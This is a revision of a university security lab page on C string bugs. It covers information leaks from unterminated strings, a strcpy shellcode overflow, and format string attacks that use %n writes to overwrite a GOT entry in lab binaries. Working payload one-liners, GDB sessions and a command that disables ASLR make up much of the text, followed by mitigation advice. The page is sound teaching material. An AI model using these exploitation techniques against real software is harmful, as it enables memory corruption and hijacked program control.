This is an old revision of the document!

Lab 07 - Strings

Resources

Secure Coding in C and C++
String representation in C
Improper string length checking
Format String definition, Format String Attack (OWASP), Format String Attack (webappsec)
strlcpy and strlcat - consistent, safe, string copy and concatenation. This resource is useful to understand some of the string manipulation problems.

Lab Support Files

We will use this lab archive throughout the lab.

Please download the lab archive an then unpack it using the commands below:

student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-07.tar.gz
student@mjolnir:~$ tar xzf lab-07.tar.gz

After unpacking we will get the lab-07/ folder that we will use for the lab:

student@mjolnir:~$ cd lab-07/
student@mjolnir:~/lab-07$ ls
basic-format-string  basic-info-leak
format-string  info-leak
printf-features  string-shellcode

Intro

This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C#, C++) are using classes to represent strings – this simplifies the way strings are handled and decreases the frequency of programming errors.

What is a string?

Conceptually, a string is sequence of characters. The representation of a string can be done in multiple ways. One of the way is to represent a string as a contiguous memory buffer. Each character is encoded in a way. For example the ASCII encoding uses 7-bit integers to encode each character – because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte.

The type for representing an ASCII character in C is char and it uses one byte. As a side note, sizeof(char) == 1 is the only guarantee that the C standard gives.

Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, more than one byte is needed for one character. char16_t, char32_t were introduced in the C standard to represent these strings. The C language also has another type, called wchar_t, which is implementation defined and should not be used to represent Unicode characters.

Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls string manipulation functions that are assuming a specific encoding of the string.

You will find extensive information on ASCII in the ascii man page. Inside an Unix terminal issue the command

man ascii

Length management

In C, the length of an ASCII string is given by its contents. An ASCII string ends with a 0 value byte called the NUL byte. Every str* function (i.e. a function with the name starting with str, such as strcpy, strcat, strdup, strstr etc.) uses this 0 byte to detect where the string ends. As a result, not ending strings in 0 and using str* functions leads to vulnerabilities.

Basic Info Leak (tutorial)

Enter the basic-info-leak/ subfolder in the lab archive. It's a basic information leak example.

In basic_info_leak.c, buf is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives 32 bytes as input then strcpy will copy bytes in my_string until it finds a NUL byte (0x00). Because the stack grows down, on most platforms, we will start accessing the content of the stack. After the buf variable the stack stores the old ebp, the function return address and then the function parameters. This information is copied into my_string. As such, printing information in my_string (after byte index 32) using puts() results in information leaks.

We can test this using:

$ python -c 'print "A"*32' | ./basic_info_leak 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����

In order to check the hexadecimal values of the leak, we pipe the output through xxd:

$ python -c 'print "A"*32' | ./basic_info_leak | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 786d 99ff f184 0408 0a

We have leaked two values above:

the old/stored ebp value (right after the buffer): 0xff996d78 (it's a little endian architecture); it will differ on your system
the my_main() return address: 0x080484f1

The return address usually doesn't change (except for executables with PIE, Position Independent Executable support). But assuming ASLR is enabled, the ebp value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the Information Leak task.

Recap: String Shellcode

For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.

In the string-shellcode/ subfolder in the lab archive you have a vulnerable executable dubbed string_shellcode. The original source code is string_shellcode.c. There is an obvious vulnerability when using strcpy() that will lead to an overflow and a rewrite of the get_num_alpha() function return address when called with a large enough number of characters in g_buffer.

Fill the TODO spots in the exploit.py script to inject and execute a shell.

ASLR is on. The shellcode will be stored at the beginning of the g_buffer global variable which has a constant address. You can determine it using:

nm string_shellcode | grep ' g_buffer'

Use GDB PEDA and pattc and patto to determine the offset between l_buffer and the get_num_alpha() function return address.

In GDB/PEDA in order to send a given string (such as the pattern outputted by pattc) to the program standard input, use the process substitution construct:

gdb-peda$ r < <(echo 'AAAA.....')

Construct the payload as usual: add the shellcode, add padding and overwrite the get_num_alpha() function return address with the address of the shellcode (i.e. the address of the g_buffer) global variable.

Information Leak

We will now show how improper string handling will lead to information leaks from the memory. For this, please access the info-leak/ subfolder in the lab archive. Please browse the info-leak.c source code file. The executable file is already generated in info-leak (a 32-bit ELF file).

The snippet below is the relevant code snippet. The goal is to call the my_evil_func() function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the my_evil_func() function by overriding the return address of the my_main() function:

#define NAME_SZ 32
 
static void read_name(char *name)
{
	memset(name, 0, NAME_SZ);
	read(0, name, NAME_SZ);
	//name[NAME_SZ-1] = 0;
}
 
static void my_main(void)
{
	char name[NAME_SZ];
 
	read_name(name);
	printf("hello %s, what address to modify and with what value?\n", name);
	fflush(stdout);
	my_memory_write();
	printf("Returning from main!\n");
}

What catches our eye is that the read() function call in the read_name() function read exactly 32 bytes. If we provide it 32 bytes it won't be null-terminated and will result in an information leak when printf() is called in the my_main() function.

Exploiting the memory write using the info leak

Let's first try to see how the program works:

$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak 
hello AAAAAAAAAA, what address to modify and with what value?

The binary wants an input from the user using the read() library call as we can see below:

$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
read(0, "AAAAAAAAAA", 32)               = 10
hello AAAAAAAAAA, what address to modify and with what value?
read(0, "", 4)                          = 0
+++ exited with 255 +++

The input is read using the read() system call. The first read expects 32 bytes. You can see already that there's another read() call. That one is the first read() call in the my_memory_write() function.

As noted above, if we use exactly 32 bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak
hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value?
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd
00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141  hello AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768  AAAAAA......, wh
00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f  at address to mo
00000040: 6469 6679 2061 6e64 2077 6974 6820 7768  dify and with wh
00000050: 6174 2076 616c 7565 3f0a                 at value?.

We see we have an information leak. We leak two pieces of data above: 0x7fffffffdcf0. The first one seems to be a stack address and the second one a code/text address.

If we run multiple times we can see that the values for the first piece of information differs:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768  AAAAAA......, wh

The variable part is related to a stack address (it starts with 0x7f); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents:

$ gdb -q ./info_leak
Reading symbols from ./info_leak...done.
gdb-peda$ b printf
Breakpoint 1 at 0x400560
gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")')
Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")')
[...]
 
gdb-peda$ x/12g name
0x7fffffffdc20:	0x4141414141414141	0x4141414141414141
0x7fffffffdc30:	0x4141414141414141	0x4141414141414141
0x7fffffffdc40:	0x00007fffffffdc50	0x00000000004007aa
gdb-peda$ x/2i 0x004007aa
   0x4007aa <main+9>:	mov    edi,0x4008bc
   0x4007af <main+14>:	call   0x400550 <puts@plt>
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x00000000004007a1 <+0>:	push   rbp
   0x00000000004007a2 <+1>:	mov    rbp,rsp
   0x00000000004007a5 <+4>:	call   0x400756 <my_main>
   0x00000000004007aa <+9>:	mov    edi,0x4008bc
   0x00000000004007af <+14>:	call   0x400550 <puts@plt>
   0x00000000004007b4 <+19>:	mov    eax,0x0
   0x00000000004007b9 <+24>:	pop    rbp
   0x00000000004007ba <+25>:	ret    
End of assembler dump.
gdb-peda$

From the GDB above, we determine that, after our buffer, there are two values: one value is the stored rbp (i.e. old rbp) and one value is the return address of the my_main() function (that gets it back to main()).

When we leak the two values we are able to retrieve the stored rbp value. In the above run the value of ebp is 0x00007fffffffdc50. We also see that the stored rbp value is stored at address 0x7fffffffdc40, which is the address current rbp. We have the situation in the below diagram:

We marked the stored rbp value (i.e. the frame pointer for main(): 0x7fffffffdc50) with the font color red in both places.

In short, if we leak the value of the stored rbp (i.e. the frame pointer for main(): 0x00007fffffffdc50) we can determine the address where the current rbp (i.e. the frame pointer for my_main(): 0x7fffffffdc40) by subtracting 16. The address where the my_main() return address is stored (0x7fffffffdc48) is computed by subtracting 8 from the leaked rbp value. By overwriting the value at this address we will force an arbitrary code execution and call my_evil_func().

In order to write the return address of the my_main() function with the address of the my_evil_func() function, make use of the conveniently (but not realistically) placed my_memory_write() function. The my_memory_write() allows the user to write arbitrary values to arbitrary memory addresses.

Considering all of this, update the TODO lines of the exploit.py script to make it call the my_evil_func() function.

Same as above, use nm to determine address of the my_evil_func() function.

Use the above logic to determine the old ebp leak and then the address of the my_main() return address.

See here examples of using the unpack() function.

In case of a successful exploit the program will return with the 42 error code in the my_evil_func() function, same as below:

$ python exploit.py 
[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead
[+] Starting local process './info_leak': pid 6422
[*] old_ebp is 0x7fffffffdd40
[*] return address is located at is 0x7fffffffdd38
[*] Process './info_leak' stopped with exit code 42 (pid 6422)

The rule of thumb is: Always know your string length.

Format String Attacks

We will now see how (im)proper use of printf may provide us with ways of extracting information or doing actual attacks.

Calling printf or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called format string attack.

The definition of printf:

int printf(const char *format, ...);

Let's recap some of useful formats:

%08x – prints a number in hex format, meaning takes a number from the stack and prints in hex format
%s – prints a string, meaning takes a pointer from the stack and prints the string from that address
%n – writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.

%x and %n are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.

Example 2

printf(my_string);

The above snippet is a good example of why ignoring compile time warnings is dangerous. The given example is easily detected by a static checker.

Try to think about:

The peculiarities of printf (variable number of arguments)
Where printf stores its arguments (hint: on the stack)
What happens when my_string is "%x"
How matching between format strings (e.g. the one above) and arguments is enforced (hint: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers
How we could use this to cause information leaks and arbitrary memory writes (hint: see the format specifiers at the beginning of the section)

Example 3

We would like to check some of the well known and not so-well known features of the printf function. Some of them may be used for information leaking and for attacks such as format string attacks.

Go into printf-features/ subfolder and browse the printf-features.c file. Compile the executable file using:

make

and then run the resulting executable file using

./printf-features

Go through the printf-features.c file again and check how print, length and conversion specifiers are used by printf. We will make use of the %n feature that allows memory writes, a requirement for attacks.

Basic Format String Attack

You will now do a basic format string attack using the basic-format-string/ subfolder in the lab archive. The source code is in basic_format_string.c and the executable is in basic_format_string.

You need to use %n to overwrite the value of the v variable to 200. You have to do three steps:

Determine the address of the v variable using nm.
Determine the n-th parameter of printf() that you can write to using %n. The buffer variable will have to be that parameter; you will store the address of the v variable in the buffer variable.
Construct a format string that enables the attack; the number of characters processed by printf() until %n is matched will have to be 200.

For the second step let's run the program multiple times and figure out where the buffer address starts. We fill buffer with the aaaa string and we expect to discover it using the printf() format specifiers.

$  ./basic_format_string 
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25

$ ./basic_format_string 
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a

$ ./basic_format_string 
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141

In the last run we get the 4141414141414141 representation of AAAAAAAA. That means that, if we replace the final %lx with %n, we will write the address 0x4141414141414141 the number of characters processed so far:

$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c
162

We need that number to be 200. You can fine tune the format string by using a construct such as %32llx to print a number on 32 characters instead of a maximum of 16 characters. See how much extra room you need and see if you reach 200 bytes.

The construct needn't use a multiple of 8 for length. You may use the %32llx or %33llx or %42llx. The numeric argument states the length of the print output.

After the plan is complete, write down the attack by filling the TODO lines in the exploit.py solution skeleton.

After you write 200 chars in v, you should obtain shell

$ python exploit64.py 
[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead
[+] Starting local process './basic_format_string': pid 20785
[*] Switching to interactive mode
                                     7fffffffdcc0  7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25
$

Extra: Format String Attack

The goal of this task is to call my_evil_func again. This task is also tutorial based.

int
main(int argc, char *argv[])
{
	printf(argv[1]);
	printf("\nThis is the most useless and insecure program!\n");
	return 0;
}

Transform Format String Attack to a Memory Write

Any string that represents a useful format (e.g. %d, %x etc.) can be used to discover the vulnerability.

$ ./format "%08x %08x %08x %08x"
00000000 f759d4d3 00000002 ffd59bd4
This is the most useless and insecure program!

The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as a information leakage. But we want more.

Another useful format for us is %m$ followed by any normal format selector. Which means that the mth parameter is used as an input for the following format. %10$08x will print the 10th paramater with %08x. This allows us to do a precise access of the stack.

Example:

$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x"
00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24
This is the most useless and insecure program!

Note the equivalence between formats.

Now, because we are able to select any higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.

$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')"

Depending on your setup you should be able to view the hex representation of the string ”%08x\n”.

Why do we need our own buffer? Remember the %n format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.

The next steps are done with ASLR disabled. In order to disable ASLR, please run

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

By trial and error or by using GDB (breakpoint on printf) we can determine

$ ./format "$(perl -e 'printf "A"x512 . "%%08x   \x0a"x200')"  | grep -n 41 | head
17:415729ac   
56:ffffdd41   
128:41007461   
129:41414141   
130:41414141

Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference Perl script to write your exploit. The code is equivalent to the above one-liner.

#!/usr/bin/env perl
 
use strict;
use warnings;
use v5.20;
 
my $stack_items = 1000;
 
printf "A" x 512;
printf "%%08x   \x0a" x $stack_items;

Then call the format using (note the enclosing double-quotes):

$ ./format "$(perl exploit.pl)"

One idea is to keep things in multiple of 4, like I did for ”%08x \x0a”. If you are looking at line 128, one of our As is there. Because the machine is little endian, the 0x41 appears as most significant byte. We want to fix this, to have our buffer aligned. Note, you can add as many format strings you want, the start of the buffer will be the same (more or less).

We can compress our buffer by specifying the position of the argument.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')"
BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342
This is the most useless and insecure program!

You can see that the last information is our “BCDE” string printed with %08x this means that we know where's our buffer.

You need to enable core dumps in order to reproduce the steps below:

$ ulimit -c unlimited

The steps below work an a given version of libc and a given system. It's why the instruction that causes the fault is

mov %edx,(%eax)

or the equivalent in Intel syntax

mov DWORD PTR [eax], edx

It may be different on your system, for example edx may be replaced by esi, cuch as

mov DWORD PTR [eax], esi

Update the explanations below accordingly.

Remove any core files you may have generated before testing your program:

rm -f core

We can replace %08x with %n this should lead to segmentation fault.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
...
Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1  0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6
#2  0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18
(gdb) x/i $eip
=> 0xf7e580a2 <vfprintf+17906>:	mov    %edx,(%eax)
(gdb) info registers $edx $eax
edx            0x202	514
eax            0x45444342	1162101570
(gdb) quit

Bingo. We have memory write. The vulnerable code tried to write at the address 0x45444342 (“BCDE” little endian) the value 514. The value 514 is the amount of data wrote so far by printf (510 As and “BCDE”).

Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input.

$ ./format "$(perl -e 'printf "BCDE". "A"x506 . "%%99x" . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
(gdb) info registers $edx $eax
edx            0x261	609
eax            0x45444342	1162101570
(gdb) quit

Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one A. You can try this by yourself.

How far can we go? Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with snprintf. 255 should be enough.

Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. The idea is to write at the address n and then at the address n+1 and so on.

Lets first display the address. We are using the address 0x804a008. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts.

$ objdump -R ./format | grep puts
0804a008 R_386_JUMP_SLOT   puts
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08x" . "%%255x|" . "%%127\$08x" . "%%255x|" . "%%128\$08x"')"
 
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
0|0804a008
f7e2a4d3|0804a009
2|0804a00a
ffffd2c4|0804a00b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program!

Why are we printing 498 As? We added 12 bytes before our format and 6 extra bytes for the output – the | is there only for pretty print. We want to keep in place the first argument – anyway, you should always check this.

Lets replace the %x with %n

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
Program terminated with signal 11, Segmentation fault.
#0  0x02020202 in ?? ()
(gdb) x/x 0x0804a000
0x804a000 <printf@got.plt>:	0xf7e5ded0
(gdb) x/x 0x0804a004
0x804a004 <fwrite@got.plt>:	0x08048396
(gdb) x/x 0x0804a008
0x804a008 <puts@got.plt>:	0x02020202
(gdb) x/x 0x0804a00c
0x804a00c <__gmon_start__@got.plt>:	0x08000006
(gdb)

In the gdb session above you can see:

the got entry for printf points to a library address (the address starts with 0xf)
the got entry for fwrite points to some code inside the binary. This means that the function wasn't yet called, the loader didn't load this address yet.
the puts entry points to 0x02020202. This is the value that we wrote.

How come we wrote the first 0x02? Just before executing the first %n the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) == 0x302.

How come the rest of the bytes are 0x02? After executing the first %n we printed another 256 bytes before each %n so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes __gmon_start__@got.plt are 0x000006.

We want to put the value 0x08048494.

$ objdump -d ./format | grep my_evil
08048494 <my_evil_func>:

The first byte is 0x94 (little endian), recall that we were able to write 0x02, writing 0x94 means replacing first 255 with 255-(0x102-0x94) == 145.

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
#0  0x94949494 in ?? ()
(gdb) quit

The next byte that we want to write is 0x84 so we need to replace 255 with 235. We can continue this idea until we profit.

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%239x|" . "%%127\$08n" . "%%127x|" . "%%128\$08n" . "%%259x|" . "%%129\$08n"')" | tr -s ' ' > /dev/null
I'm evil, but nobody calls me :-(

[1p] Bonus task Can you get a shell? (Assume ASLR is disabled).

Mitigation and Recommendations

Manage the string length carefully
Don't use gets. With gets there is no way of knowing how much data was read
Use string functions with n parameter, whenever a non constant string is involved. i.e. strnprintf, strncat.
Make sure that the NUL byte is added, for instance strncpy does not add a NUL byte.
Use wcstr* functions when dealing with wide char strings.
Don't trust the user!

Real life Examples

Heartbleed
Linux kernel through 3.9.4 CVE-2013-2851. The fix is here. More details here.
Windows 7 CVE-2012-1851.
Pidgin off the record plugin CVE-2012-2369. The fix is here

Resources

Labs

Lectures

Assignments

Extra

Lab 07 - Strings

cns/labs/lab-07.1573405830.txt.gz · Last modified: 2019/11/10 19:10 by cristina.popescu

Old revisions

Media Manager Back to top

Lab 07 - Strings

Resources

Lab Support Files

Intro

What is a string?

Length management

Basic Info Leak (tutorial)

Recap: String Shellcode

Information Leak

Exploiting the memory write using the info leak

Format String Attacks

Example 2

Example 3

Basic Format String Attack

Extra: Format String Attack

Transform Format String Attack to a Memory Write

Mitigation and Recommendations

Real life Examples

Resources

Labs

Lectures

Assignments

Extra

Table of Contents